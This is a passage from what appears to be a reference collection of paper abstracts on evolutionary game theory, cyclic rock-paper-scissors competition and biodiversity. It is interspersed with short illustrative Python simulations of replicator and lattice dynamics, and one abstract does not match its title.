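    Mean-field rock-paper-scissors replicator dynamics with a symmetric mutation term.
    x  : densities (x0, x1, x2) on the simplex, species i beats species i+1 (mod 3)
    mu : mutation rate between species
    This zero-sum form is a generic illustration, not the exact model of the cited paper.
    """
    x = np.asarray(x, dtype=float)
    dx = np.empty(3)
    for i in range(3):
        prey, predator = x[(i + 1) % 3], x[(i - 1) % 3]
        selection = x[i] * (prey - predator)              # wins against prey, loses to predator
        mutation = mu * (prey + predator - 2.0 * x[i])    # symmetric mutation between species
        dx[i] = selection + mutation
    return dx

def rk4_step(x, mu, dt):
    """One classical Runge-Kutta step of the mean-field flow."""
    k1 = rps_mutation_flow(x, mu)
    k2 = rps_mutation_flow(x + 0.5 * dt * k1, mu)
    k3 = rps_mutation_flow(x + 0.5 * dt * k2, mu)
    k4 = rps_mutation_flow(x + dt * k3, mu)
    return x + dt / 6.0 * (k1 + 2 * k2 + 2 * k3 + k4)

def integrate(x0, mu, dt=0.01, steps=20_000):
    x = np.array(x0, dtype=float)
    for _ in range(steps):
        x = rk4_step(x, mu, dt)
    return x

for mu in (0.0, 0.02):
    final = integrate([0.6, 0.3, 0.1], mu)
    print(f"mu = {mu:.2f}   densities at t = 200: {final.round(3)}")
# Without mutation the densities keep cycling; with mu > 0 they spiral into (1/3, 1/3, 1/3).
```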
--- paper_title: Imitation, internal absorption and the reversal of local drift in stochastic evolutionary games paper_content: Evolutionary game dynamics in finite populations is typically subject to noise, inducing effects which are not present in deterministic systems, including fixation and extinction. In the first part of this paper we investigate the phenomenon of drift reversal in finite populations, taking into account that drift is a local quantity in strategy space. Secondly, we study a simple imitation dynamics, and show that it can lead to fixation at internal mixed-strategy fixed points even in finite populations. Imitation in infinite populations is adequately described by conventional replicator dynamics, and these equations are known to have internal fixed points. Internal absorption in finite populations on the other hand is a novel dynamic phenomenon. Due to an outward drift in finite populations this type of dynamic arrest is not found in other commonly studied microscopic dynamics, not even in those with the same deterministic replicator limit as imitation. --- paper_title: Noise-guided evolution within cyclical interactions paper_content: We study a stochastic predator–prey model on a square lattice, where each of the six species has two superior and two inferior partners. The invasion probabilities between species depend on the predator–prey pair and are supplemented by Gaussian noise. Conditions are identified that warrant the largest impact of noise on the evolutionary process, and the results of Monte Carlo simulations are qualitatively reproduced by a four-point cluster dynamical mean-field approximation. The observed noise-guided evolution is deeply routed in short-range spatial correlations, which is supported by simulations on other host lattice topologies. Our findings are conceptually related to the coherence resonance phenomenon in dynamical systems via the mechanism of threshold duality. We also show that the introduced concept of noise-guided evolution via the exploitation of threshold duality is not limited to predator–prey cyclical interactions, but may apply to models of evolutionary game theory as well, thus indicating its applicability in several different fields of research. --- paper_title: Extinction in neutrally stable stochastic Lotka-Volterra models paper_content: Populations of competing biological species exhibit a fascinating interplay between the nonlinear dynamics of evolutionary selection forces and random fluctuations arising from the stochastic nature of the interactions. The processes leading to extinction of species, whose understanding is a key component in the study of evolution and biodiversity, are influenced by both of these factors. Here, we investigate a class of stochastic population dynamics models based on generalized Lotka-Volterra systems. In the case of neutral stability of the underlying deterministic model, the impact of intrinsic noise on the survival of species is dramatic: It destroys coexistence of interacting species on a time scale proportional to the population size. We introduce a new method based on stochastic averaging which allows one to understand this extinction process quantitatively by reduction to a lower-dimensional effective dynamics. This is performed analytically for two highly symmetrical models and can be generalized numerically to more complex situations. The extinction probability distributions and other quantities of interest we obtain show excellent agreement with simulations. 
--- paper_title: Replicator dynamics of reward & reputation in public goods games. paper_content: Public goods games have become the mathematical metaphor for game theoretical investigations of cooperative behavior in groups of interacting individuals. Cooperation is a conundrum because cooperators make a sacrifice to benefit others at some cost to themselves. Exploiters or defectors reap the benefits and forgo costs. Despite the fact that groups of cooperators outperform groups of defectors, Darwinian selection or utilitarian principles based on rational choice should favor defectors. In order to overcome this social dilemma, much effort has been expended for investigations pertaining to punishment and sanctioning measures against defectors. Interestingly, the complementary approach to create positive incentives and to reward cooperation has received considerably less attention-despite being heavily advocated in education and social sciences for increasing productivity or preventing conflicts. Here we show that rewards can indeed stimulate cooperation in interaction groups of arbitrary size but, in contrast to punishment, fail to stabilize it. In both cases, however, reputation is essential. The combination of reward and reputation result in complex dynamics dominated by unpredictable oscillations. --- paper_title: Spatial aspects of interspecific competition. paper_content: Using several variants of a stochastic spatial model introduced by Silvertown et al., we investigate the effect of spatial distribution of individuals on the outcome of competition. First, we prove rigorously that if one species has a competitive advantage over each of the others, then eventually it takes over all the sites in the system. Second, we examine tradeoffs between competition and dispersal distance in a two-species system. Third, we consider a cyclic competitive relationship between three types. In this case, a nonspatial treatment leads to densities that follow neutrally stable cycles or even unstable spiral solutions, while a spatial model yields a stationary distribution with an interesting spatial structure. --- paper_title: Alleopathy and spatial competition among coral reef invertebrates. paper_content: Species of ectoprocts and solitary encrusting animals were subjected in aquaria to homogenates of 11 sympatric species of sponges and colonial ascidians. Five of the nine sponge species and one of the two ascidian species exhibited species-specific allelochemical effects. Evidence suggests that alleochemical provide a wide-spread, specific, and complex mechanism for interference competition for space among natural populations of coral reef organisms. The existence of such species-specific mechanisms may provide a basis for maintenance of diversity in space-limited systems in the absence of high levels of predation and physical disturbance. --- paper_title: Social learning promotes institutions for governing the commons paper_content: Cooperation in evolutionary games can be stabilized through punishment of non-cooperators, at a cost to those who do the punishing. Punishment can take different forms, in particular peer-punishment, in which individuals punish free-riders after the event, and pool-punishment, in which a fund for sanctioning is set up beforehand. These authors show that pool-punishment is superior to peer-punishment in dealing with second-order free-riders, who cooperate in the main game but refuse to contribute to punishment. 
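The institutional ("pool") punishment entry that closes above, like the pool-punishment phase-diagram entry a few references earlier, differs from peer punishment mainly in how sanctioning costs are paid: as a flat contribution to a fund up front rather than per offence. The toy function below contrasts the two accounting schemes within one group, in the spirit of the peer-punishment sketch given earlier in this list; all parameter values are invented for illustration and do not reproduce either cited model.

```python
def group_payoffs(strategies, scheme="peer", r=3.0, c=1.0, fine=0.8, peer_cost=0.3, pool_fee=0.2):
    """
    Payoffs in one public goods group with punishing cooperators ('P').
    strategies : list of 'C' (cooperator), 'D' (defector), 'P' (punishing cooperator)
    scheme     : 'peer' -> each P pays peer_cost per defector actually punished;
                 'pool' -> each P pays the flat pool_fee up front, defectors present or not.
    All numbers are illustrative assumptions, not values from the cited papers.
    """
    n = len(strategies)
    contributors = sum(s in ('C', 'P') for s in strategies)
    punishers = strategies.count('P')
    defectors = strategies.count('D')
    share = r * c * contributors / n          # equal share of the multiplied common pool
    payoffs = []
    for s in strategies:
        p = share
        if s in ('C', 'P'):
            p -= c                            # contributors pay the cost of cooperation
        if s == 'D':
            p -= fine * punishers             # fined once per punisher under both schemes
        if s == 'P':
            p -= peer_cost * defectors if scheme == "peer" else pool_fee
        payoffs.append(round(p, 3))
    return payoffs

group = ['C', 'P', 'P', 'D', 'D']
print("peer:", group_payoffs(group, scheme="peer"))
print("pool:", group_payoffs(group, scheme="pool"))
```

The contrast the entries above study is visible even in this toy version: pool punishers pay their fee regardless of whether defectors are around, whereas peer punishers only pay when there is someone to sanction.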
--- paper_title: Modelling patch dynamics on rocky shores using deterministic cellular automata paper_content: Information on biodiversity and community structure is vital for monitoring the effects of climate change and other anthropogenic impacts. Benthic ecosystems of 5 sites off Viti Levu (Fiji), comprising 50 stations, were sampled quantitatively, revealing 13 128 individuals of 230 species at a mean density of 273.5 ind. m–2. Common taxa included polychaetes (89 species), crustaceans (84 species), molluscs (50 species) and echinoderms (7 species). No species occurred in all 50 stations; the maximum distribution range was 45 stations occupied by the polychaete Aglaophamus sp. A total of 81 species (35.2%) were restricted to single sites (‘uniques’), highlighting spot endemism. Species richness and rarefaction curves provided high estimates of diversity. Multivariate analyses incorporating biological abundances and environmental factors showed 3 distinct clusters among sites characterising differences in benthic community structure. Strongest determinants of faunal distribution were depth, distance from reef and river, and sand content. The presence of heterogeneous faunal assemblages suggests the interplay of these factors at each site. Fauna in Nadi Bay (Shannon-Wiener diversity index H’: 3.26), Suva Harbour (H’: 3.19) and Laucala Bay Lagoon (H’: 3.06) had high diversity indicative of biologically accommodated communities. Rewa River Estuary (H’: 2.42) and Nukubuco Reef drop-off (H’: 2.48) had low diversities, typical of habitats subjected to fluctuating environmental conditions. Benthic community structure in the lagoons around Viti Levu was rich and diverse. Biodiversity was greater than previously recorded from the Great Astrolabe Reef, Fiji (207 to 211 species) and Australia’s Great Barrier Reef (154 species), but lower than in New Caledonia (311 species) and Tahiti (315 species). --- paper_title: Mutual Feedbacks Maintain Both Genetic and Species Diversity in a Plant Community paper_content: The forces that maintain genetic diversity among individuals and diversity among species are usually studied separately. Nevertheless, diversity at one of these levels may depend on the diversity at the other. We have combined observations of natural populations, quantitative genetics, and field experiments to show that genetic variation in the concentration of an allelopathic secondary compound in Brassica nigra is necessary for the coexistence of B. nigra and its competitor species. In addition, the diversity of competing species was required for the maintenance of genetic variation in the trait within B. nigra. Thus, conservation of species diversity may also necessitate maintenance of the processes that sustain the genetic diversity of each individual species. --- paper_title: Local migration promotes competitive restraint in a host–pathogen 'tragedy of the commons' paper_content: These T4 phage and their E. coli hosts are the model for a typical 'victim-exploiter' interaction in a study of the role of migration patterns in a 'tragedy of the commons' competition for limited resources within fragmented communities. In this host-pathogen system, growing in 96-well microtitre plates, coexistence, stability and evolution within the separated communities depend critically on migration: restricted migration can promote restraint in the use of the common resource. In this experiment and in theory, highly connected social networks favour virulence.
Fragmented populations possess an intriguing duplicity: even if subpopulations are reliably extinction-prone, asynchrony in local extinctions and recolonizations makes global persistence possible1,2,3,4,5,6,7,8. Migration is a double-edged sword in such cases: too little migration prevents recolonization of extinct patches, whereas too much synchronizes subpopulations, raising the likelihood of global extinction. Both edges of this proverbial sword have been explored by manipulating the rate of migration within experimental populations1,3,4,5,6,8. However, few experiments have examined how the evolutionary ecology of fragmented populations depends on the pattern of migration5. Here, we show that the migration pattern affects both coexistence and evolution within a community of bacterial hosts (Escherichia coli) and viral pathogens (T4 coliphage) distributed across a large network of subpopulations. In particular, different patterns of migration select for distinct pathogen strategies, which we term 'rapacious' and 'prudent'. These strategies define a 'tragedy of the commons'9: rapacious phage displace prudent variants for shared host resources, but prudent phage are more productive when alone. We find that prudent phage dominate when migration is spatially restricted, while rapacious phage evolve under unrestricted migration. Thus, migration pattern alone can determine whether a de novo tragedy of the commons is resolved in favour of restraint. --- paper_title: Evolution and the Theory of Games paper_content: In the Hamadryas baboon, males are substantially larger than females. A troop of baboons is subdivided into a number of ‘one-male groups’, consisting of one adult male and one or more females with their young. The male prevents any of ‘his’ females from moving too far from him. Kummer (1971) performed the following experiment. Two males, A and B, previously unknown to each other, were placed in a large enclosure. Male A was free to move about the enclosure, but male B was shut in a small cage, from which he could observe A but not interfere. A female, unknown to both males, was then placed in the enclosure. Within 20 minutes male A had persuaded the female to accept his ownership. Male B was then released into the open enclosure. Instead of challenging male A , B avoided any contact, accepting A’s ownership. --- paper_title: Evolution of restraint in a structured rock-paper-scissors community. paper_content: It is not immediately clear how costly behavior that benefits others evolves by natural selection. By saving on inherent costs, individuals that do not contribute socially have a selective advantage over altruists if both types receive equal benefits. Restrained consumption of a common resource is a form of altruism. The cost of this kind of prudent behavior is that restrained individuals give up resources to less-restrained individuals. The benefit of restraint is that better resource management may prolong the persistence of the group. One way to dodge the problem of defection is for altruists to interact disproportionately with other altruists. With limited dispersal, restrained individuals persist because of interaction with like types, whereas it is the unrestrained individuals that must face the negative long-term consequences of their rapacity. Here, we study the evolution of restraint in a community of three competitors exhibiting a nontransitive (rock–paper–scissors) relationship. 
The nontransitivity ensures a form of negative feedback, whereby improvement in growth of one competitor has the counterintuitive consequence of lowering the density of that improved player. This negative feedback generates detrimental long-term consequences for unrestrained growth. Using both computer simulations and evolution experiments with a nontransitive community of Escherichia coli, we find that restrained growth can evolve under conditions of limited dispersal in which negative feedback is present. This research, thus, highlights a set of ecological conditions sufficient for the evolution of one form of altruism. --- paper_title: Competing associations in bacterial warfare with two toxins paper_content: Simple combinations of common competitive mechanisms can easily result in cyclic competitive dominance relationships between species. The topological features of such competitive networks allow for complex spatial coexistence patterns. We investigate self-organization and coexistence in a lattice model, describing the spatial population dynamics of competing bacterial strains. With increasing diffusion rate the community of the nine possible toxicity/resistance types undergoes two phase transitions. Below a critical level of diffusion, the system exhibits expanding domains of three different defensive alliances, each consisting of three cyclically dominant species. Due to the neutral relationship between these alliances and the finite system size effect, ultimately only one of them remains. At large diffusion rates the system admits three coexisting domains, each containing mutually neutral species. Because of the cyclical dominance between these domains, a long term stable coexistence of all species is ensured. In the third phase at intermediate diffusion the spatial structure becomes even more complicated with domains of mutually neutral species persisting along the borders of defensive alliances. The study reveals that cyclic competitive relationships may produce a large variety of complex coexistence patterns, exhibiting common features of natural ecosystems, like hierarchical organization, phase transitions and sudden, large-scale fluctuations. --- paper_title: Phase transitions induced by variation of invasion rates in spatial cyclic predator-prey models with four or six species paper_content: Cyclic predator-prey models with four or six species are studied on a square lattice when the invasion rates are varied. It is found that the cyclic invasions maintain a self-organizing pattern as long as the deviation of the invasion rate(s) from a uniform value does not exceed a threshold value. For larger deviations the system exhibits a continuous phase transition into a frozen distribution of odd (or even) label species. --- paper_title: Chemical warfare between microbes promotes biodiversity paper_content: Evolutionary processes generating biodiversity and ecological mechanisms maintaining biodiversity seem to be diverse themselves. Conventional explanations of biodiversity such as niche differentiation, density-dependent predation pressure, or habitat heterogeneity seem satisfactory to explain diversity in communities of macrobial organisms such as higher plants and animals. For a long time the often high diversity among microscopic organisms in seemingly uniform environments, the famous “paradox of the plankton,” has been difficult to understand. 
The biodiversity in bacterial communities has been shown to be sometimes orders of magnitudes higher than the diversity of known macrobial systems. Based on a spatially explicit game theoretical model with multiply cyclic dominance structures, we suggest that antibiotic interactions within microbial communities may be very effective in maintaining diversity. --- paper_title: Stability and robustness analysis of cooperation cycles driven by destructive agents in finite populations paper_content: The emergence and promotion of cooperation are two of the main issues in evolutionary game theory, as cooperation is amenable to exploitation by defectors, which take advantage of cooperative individuals at no cost, dooming them to extinction. It has been recently shown that the existence of purely destructive agents (termed jokers) acting on the common enterprises (public goods games) can induce stable limit cycles among cooperation, defection, and destruction when infinite populations are considered. These cycles allow for time lapses in which cooperators represent a relevant fraction of the population, providing a mechanism for the emergence of cooperative states in nature and human societies. Here we study analytically and through agent-based simulations the dynamics generated by jokers in finite populations for several selection rules. Cycles appear in all cases studied, thus showing that the joker dynamics generically yields a robust cyclic behavior not restricted to infinite populations. We also compute the average time in which the population consists mostly of just one strategy and compare the results with numerical simulations. --- paper_title: Evolutionary classification of toxin mediated interactions in microorganisms paper_content: A trade-off between the parameters of Lotka-Volterra systems is used to give verifications of relations between intrinsic growth rate and limiting capacity and the stability type of the resulting dynamical system. The well known rock-paper-scissors game serves as a template for toxin mediated interactions, which is best represented by the bacteriocin producing Escherichia coli bacteria. There, we have three strains of the same species. The producer produces a toxin lethal to the sensitive, while the resistant is able to protect itself from that toxin. Due to the fact that there are costs for production and for resistance, a dynamics similar to the rock-paper-scissors game results. By using an adaptive dynamics approach for competitive Lotka-Volterra systems and assuming an inverse relation (trade-off) between intrinsic growth rate (IGR) and limiting capacity (LC) we obtain evolutionary and convergence stable relations between the IGR's and the LC's. Furthermore this evolutionary process leads to a phase topology of the population dynamics with a globally stable interior fixed point by leaving the interaction parameters constant. While the inverse trade-off stabilizes coexistence and does not allow branching, toxicity itself can promote diversification. The results are discussed in view of several biological examples indicating that the above results are structurally valid. --- paper_title: Chemical warfare and survival strategies in bacterial range expansions paper_content: Dispersal of species is a fundamental ecological process in the evolution and maintenance of biodiversity. 
Limited control over ecological parameters has hindered progress in understanding of what enables species to colonize new areas, as well as the importance of interspecies interactions. Such control is necessary to construct reliable mathematical models of ecosystems. In our work, we studied dispersal in the context of bacterial range expansions and identified the major determinants of species coexistence for a bacterial model system of three Escherichia coli strains (toxin-producing, sensitive and resistant). Genetic engineering allowed us to tune strain growth rates and to design different ecological scenarios (cyclic and hierarchical). We found that coexistence of all strains depended on three strongly interdependent factors: composition of inoculum, relative strain growth rates and effective toxin range. Robust agreement between our experiments and a thoroughly calibrated computational model enabled us to extrapolate these intricate interdependencies in terms of phenomenological biodiversity laws. Our mathematical analysis also suggested that cyclic dominance between strains is not a prerequisite for coexistence in competitive range expansions. Instead, robust three-strain coexistence required a balance between growth rates and either a reduced initial ratio of the toxin-producing strain, or a sufficiently short toxin range. --- paper_title: Evolutionary Games and Population Dynamics paper_content: Every form of behavior is shaped by trial and error. Such stepwise adaptation can occur through individual learning or through natural selection, the basis of evolution. Since the work of Maynard Smith and others, it has been realized how game theory can model this process. Evolutionary game theory replaces the static solutions of classical game theory by a dynamical approach centered not on the concept of rational players but on the population dynamics of behavioral programs. In this book the authors investigate the nonlinear dynamics of the self-regulation of social and economic behavior, and of the closely related interactions among species in ecological communities. Replicator equations describe how successful strategies spread and thereby create new conditions that can alter the basis of their success, i.e., to enable us to understand the strategic and genetic foundations of the endless chronicle of invasions and extinctions that punctuate evolution. In short, evolutionary game theory describes when to escalate a conflict, how to elicit cooperation, why to expect a balance of the sexes, and how to understand natural selection in mathematical terms. ::: ::: Comprehensive treatment of ecological and game theoretic dynamics ::: Invasion dynamics and permanence as key concepts ::: Explanation in terms of games of things like competition between species --- paper_title: Coevolutionary games - a mini review paper_content: Prevalence of cooperation within groups of selfish individuals is puzzling in that it contradicts with the basic premise of natural selection. Favoring players with higher fitness, the latter is key for understanding the challenges faced by cooperators when competing with defectors. Evolutionary game theory provides a competent theoretical framework for addressing the subtleties of cooperation in such situations, which are known as social dilemmas. Recent advances point towards the fact that the evolution of strategies alone may be insufficient to fully exploit the benefits offered by cooperative behavior. 
Indeed, while spatial structure and heterogeneity, for example, have been recognized as potent promoters of cooperation, coevolutionary rules can extend the potentials of such entities further, and even more importantly, lead to the understanding of their emergence. The introduction of coevolutionary rules to evolutionary games implies, that besides the evolution of strategies, another property may simultaneously be subject to evolution as well. Coevolutionary rules may affect the interaction network, the reproduction capability of players, their reputation, mobility or age. Here we review recent works on evolutionary games incorporating coevolutionary rules, as well as give a didactic description of potential pitfalls and misconceptions associated with the subject. In addition, we briefly outline directions for future research that we feel are promising, thereby particularly focusing on dynamical effects of coevolutionary rules on the evolution of cooperation, which are still widely open to research and thus hold promise of exciting new discoveries. --- paper_title: A three-species model explaining cyclic dominance of pacific salmon paper_content: The four-year oscillations of the number of spawning sockeye salmon (Oncorhynchus nerka) that return to their native stream within the Fraser River basin in Canada are a striking example of population oscillations. The period of the oscillation corresponds to the dominant generation time of these fish. Various - not fully convincing - explanations for these oscillations have been proposed, including stochastic influences, depensatory fishing, or genetic effects. Here, we show that the oscillations can be explained as a stable dynamical attractor of the population dynamics, resulting from a strong resonance near a Neimark Sacker bifurcation. This explains not only the long-term persistence of these oscillations, but also reproduces correctly the empirical sequence of salmon abundance within one period of the oscillations. Furthermore, it explains the observation that these oscillations occur only in sockeye stocks originating from large oligotrophic lakes, and that they are usually not observed in salmon species that have a longer generation time. --- paper_title: Evolutionary Game Theory: Theoretical Concepts and Applications to Microbial Communities paper_content: Ecological systems are complex assemblies of large numbers of individuals, interacting competitively under multifaceted environmental conditions. Recent studies using microbial laboratory communities have revealed some of the self-organization principles underneath the complexity of these systems. A major role of the inherent stochasticity of its dynamics and the spatial segregation of different interacting species into distinct patterns has thereby been established. It ensures the viability of microbial colonies by allowing for species diversity, cooperative behavior and other kinds of “social” behavior. ::: ::: A synthesis of evolutionary game theory, nonlinear dynamics, and the theory of stochastic processes provides the mathematical tools and a conceptual framework for a deeper understanding of these ecological systems. We give an introduction into the modern formulation of these theories and illustrate their effectiveness focussing on selected examples of microbial systems. Intrinsic fluctuations, stemming from the discreteness of individuals, are ubiquitous, and can have an important impact on the stability of ecosystems. 
In the absence of speciation, extinction of species is unavoidable. It may, however, take very long times. We provide a general concept for defining survival and extinction on ecological time-scales. Spatial degrees of freedom come with a certain mobility of individuals. When the latter is sufficiently high, bacterial community structures can be understood through mapping individual-based models, in a continuum approach, onto stochastic partial differential equations. These allow progress using methods of nonlinear dynamics such as bifurcation analysis and invariant manifolds. We conclude with a perspective on the current challenges in quantifying bacterial pattern formation, and how this might have an impact on fundamental research in non-equilibrium physics. --- paper_title: Labyrinthine clustering in a spatial rock-paper-scissors ecosystem paper_content: The spatial rock-paper-scissors ecosystem, where three species interact cyclically, is a model example of how spatial structure can maintain biodiversity. We here consider such a system for a broad range of interaction rates. When one species grows very slowly, this species and its prey dominate the system by self-organizing into a labyrinthine configuration in which the third species propagates. The cluster size distributions of the two dominating species have heavy tails and the configuration is stabilized through a complex spatial feedback loop. We introduce a statistical measure that quantifies the amount of clustering in the spatial system by comparison with its mean-field approximation. Hereby, we are able to quantitatively explain how the labyrinthine configuration slows down the dynamics and stabilizes the system. --- paper_title: Mobility promotes and jeopardizes biodiversity in rock-paper-scissors games paper_content: Biodiversity is essential to the viability of ecological systems. Species diversity in ecosystems is promoted by cyclic, non-hierarchical interactions among competing populations. Such non-transitive relations lead to an evolution with central features represented by the `rock-paper-scissors' game, where rock crushes scissors, scissors cut paper, and paper wraps rock. In combination with spatial dispersal of static populations, this type of competition results in the stable coexistence of all species and the long-term maintenance of biodiversity. However, population mobility is a central feature of real ecosystems: animals migrate, bacteria run and tumble. Here, we observe a critical influence of mobility on species diversity. When mobility exceeds a certain value, biodiversity is jeopardized and lost. In contrast, below this critical threshold all subpopulations coexist and an entanglement of travelling spiral waves forms in the course of temporal evolution. We establish that this phenomenon is robust, it does not depend on the details of cyclic competition or spatial environment. These findings have important implications for maintenance and evolution of ecological systems and are relevant for the formation and propagation of patterns in excitable media, such as chemical kinetics or epidemic outbreaks. --- paper_title: Three- and four-state rock-paper-scissors games with diffusion paper_content: Cyclic dominance of three species is a commonly occurring interaction dynamics, often denoted the rock-paper-scissors (RPS) game. Such a type of interactions is known to promote species coexistence. 
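The stochastic lattice dynamics summarized in the preceding entries (cyclic selection, reproduction into empty sites, and mobility realized as nearest-neighbour pair exchange) can be sketched in a few lines of Python. This is a minimal illustration only: the lattice size, the rates sigma, mu and eps, and the random sequential update are assumptions chosen for readability, not the parameters of any cited study.

```python
import numpy as np

rng = np.random.default_rng(0)

L = 60                            # lattice size (illustrative)
sigma, mu, eps = 1.0, 1.0, 5.0    # selection, reproduction, exchange rates (assumed)
steps = 200 * L * L               # number of elementary update attempts
total = sigma + mu + eps

# states: 0 = empty site, 1, 2, 3 = the three cyclically dominating species
grid = rng.integers(0, 4, size=(L, L))

def neighbor(x, y):
    dx, dy = [(1, 0), (-1, 0), (0, 1), (0, -1)][rng.integers(4)]
    return (x + dx) % L, (y + dy) % L          # periodic boundaries

for _ in range(steps):
    x, y = rng.integers(L), rng.integers(L)
    if grid[x, y] == 0:
        continue
    nx, ny = neighbor(x, y)
    r = rng.random() * total
    if r < sigma:
        # selection: species s removes species s+1 (cyclically), leaving an empty site
        prey = grid[x, y] % 3 + 1
        if grid[nx, ny] == prey:
            grid[nx, ny] = 0
    elif r < sigma + mu:
        # reproduction into an empty neighbouring site
        if grid[nx, ny] == 0:
            grid[nx, ny] = grid[x, y]
    else:
        # mobility: pair exchange with the neighbour
        grid[x, y], grid[nx, ny] = grid[nx, ny], grid[x, y]

print("final densities:", [float(np.mean(grid == s)) for s in (1, 2, 3)])
```

Sweeping the exchange rate eps relative to sigma and mu is the kind of numerical experiment used in these studies to locate the mobility threshold beyond which spiral patterns outgrow the system and coexistence is lost.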
Here, we generalize recent results of Reichenbach [Nature (London) 448, 1046 (2007)] of a four-state variant of the RPS game. We show that spiral formation takes place only without a conservation law for the total density. Nevertheless, in general, fast diffusion can destroy species coexistence. We also generalize the four-state model to slightly varying reaction rates. This is shown both analytically and numerically not to change pattern formation, or the effective wavelength of the spirals, and therefore not to alter the qualitative properties of the crossover to extinction. --- paper_title: When does cyclic dominance lead to stable spiral waves? paper_content: Species diversity in ecosystems is often accompanied by the self-organisation of the population into fascinating spatio-temporal patterns. Here, we consider a two-dimensional three-species population model and study the spiralling patterns arising from the combined effects of generic cyclic dominance, mutation, pair-exchange and hopping of the individuals. The dynamics is characterised by nonlinear mobility and a Hopf bifurcation around which the system's phase diagram is inferred from the underlying complex Ginzburg-Landau equation derived using a perturbative multiscale expansion. While the dynamics is generally characterised by spiralling patterns, we show that spiral waves are stable in only one of the four phases. Furthermore, we characterise a phase where nonlinearity leads to the annihilation of spirals and to the spatially uniform dominance of each species in turn. Away from the Hopf bifurcation, when the coexistence fixed point is unstable, the spiralling patterns are also affected by nonlinear diffusion. --- paper_title: Co-existence in the two-dimensional May-Leonard model with random rates paper_content: We employ Monte Carlo simulations to numerically study the temporal evolution and transient oscillations of the population densities, the associated frequency power spectra, and the spatial correlation functions in the (quasi-) steady state in two-dimensional stochastic May-Leonard models of mobile individuals, allowing for particle exchanges with nearest-neighbors and hopping onto empty sites. We therefore consider a class of four-state three-species cyclic predator-prey models whose total particle number is not conserved. We demonstrate that quenched disorder in either the reaction or in the mobility rates hardly impacts the dynamical evolution, the emergence and structure of spiral patterns, or the mean extinction time in this system. We also show that direct particle pair exchange processes promote the formation of regular spiral structures. Moreover, upon increasing the rates of mobility, we observe a remarkable change in the extinction properties in the May-Leonard system (for small system sizes): (1) as the mobility rate exceeds a threshold that separates a species coexistence (quasi-) steady state from an absorbing state, the mean extinction time as function of system size N crosses over from a functional form ∼ e cN /N (where c is a constant) to a linear dependence; (2) the measured histogram of extinction times displays a corresponding crossover from an (approximately) exponential to a Gaussian distribution. The latter results are found to hold true also when the mobility rates are randomly distributed. --- paper_title: Spontaneous formation of dynamical patterns with fractal fronts in the cyclic lattice Lotka-Volterra model. 
paper_content: Dynamical patterns, in the form of consecutive moving stripes or rings, are shown to develop spontaneously in the cyclic lattice Lotka-Volterra model, when realized on a square lattice, in the reaction-limited regime. Each stripe consists of different particles (species) and the borderlines between consecutive stripes are fractal. The interface width w between the different species scales as w(L,t) ≈ L^α f(t/L^z), where L is the linear size of the interface, t is the time, and α and z are the static and dynamical critical exponents, respectively. The critical exponents were computed as α = 0.49 ± 0.03 and z = 1.53 ± 0.13, and the propagating fronts show dynamical characteristics similar to those of the Eden growth models. --- paper_title: Instability of spatial patterns and its ambiguous impact on species diversity paper_content: Self-arrangement of individuals into spatial patterns often accompanies and promotes species diversity in ecological systems. Here, we investigate pattern formation arising from cyclic dominance of three species, operating near a bifurcation point. In its vicinity, an Eckhaus instability occurs, leading to convectively unstable "blurred" patterns. At the bifurcation point, stochastic effects dominate and induce counterintuitive effects on diversity: Large patterns, emerging for medium values of individuals' mobility, lead to rapid species extinction, while small patterns (low mobility) promote diversity, and high mobilities render spatial structures irrelevant. We provide a quantitative analysis of these phenomena, employing a complex Ginzburg-Landau equation. --- paper_title: Rock-scissors-paper game in a chaotic flow: the effect of dispersion on the cyclic competition of microorganisms. paper_content: Laboratory experiments and numerical simulations have shown that the outcome of cyclic competition is significantly affected by the spatial distribution of the competitors. Short-range interaction and limited dispersion allow for coexistence of competing species that cannot coexist in a well-mixed environment. In order to elucidate the mechanisms that destroy species diversity we study the intermediate situation of imperfect mixing, typical in aquatic media, in a model of cyclic competition between toxin producing, sensitive and resistant phenotypes. It is found that chaotic mixing, by changing the character of the spatial distribution, induces coherent oscillations in the populations. The magnitude of the oscillations increases with the strength of mixing, leading to the extinction of some species beyond a critical mixing rate. When mixing is non-uniform in space, coexistence can be sustained at much stronger mixing by the formation of partially isolated regions that prevent global extinction. The heterogeneity of mixing may enable toxin producing and sensitive strains to coexist for a very long time at strong mixing. --- paper_title: Coexistence versus extinction in the stochastic cyclic Lotka-Volterra model paper_content: Cyclic dominance of species has been identified as a potential mechanism to maintain biodiversity, see, e.g., B. Kerr, M. A. Riley, M. W. Feldman and B. J. M. Bohannan [Nature 418, 171 (2002)] and B. Kirkup and M. A. Riley [Nature 428, 412 (2004)]. Through analytical methods supported by numerical simulations, we address this issue by studying the properties of a paradigmatic non-spatial three-species stochastic system, namely, the "rock-paper-scissors" or cyclic Lotka-Volterra model.
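For orientation, the deterministic rate equations of this cyclic Lotka-Volterra model (species A consumes B, B consumes C, C consumes A) read da/dt = a(b - c), db/dt = b(c - a), dc/dt = c(a - b) when all reaction rates are set to one. The short sketch below, with unit rates and an arbitrary initial condition as illustrative assumptions, integrates them and checks the two conserved quantities that make the mean-field orbits neutrally stable.

```python
import numpy as np
from scipy.integrate import solve_ivp

def cyclic_lv(t, y):
    a, b, c = y
    # A consumes B, B consumes C, C consumes A, all at unit rate (assumed)
    return [a * (b - c), b * (c - a), c * (a - b)]

sol = solve_ivp(cyclic_lv, (0.0, 100.0), [0.5, 0.3, 0.2],
                dense_output=True, rtol=1e-9, atol=1e-12)
t = np.linspace(0.0, 100.0, 2000)
a, b, c = sol.sol(t)

# two invariants of the mean-field flow: the total density and the product abc
print("drift of a+b+c:", np.ptp(a + b + c))
print("drift of abc:  ", np.ptp(a * b * c))
```

In a finite population the same reactions, implemented stochastically, drift away from these closed orbits; that fluctuation-driven loss of species is exactly the point made in the entry that continues below.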
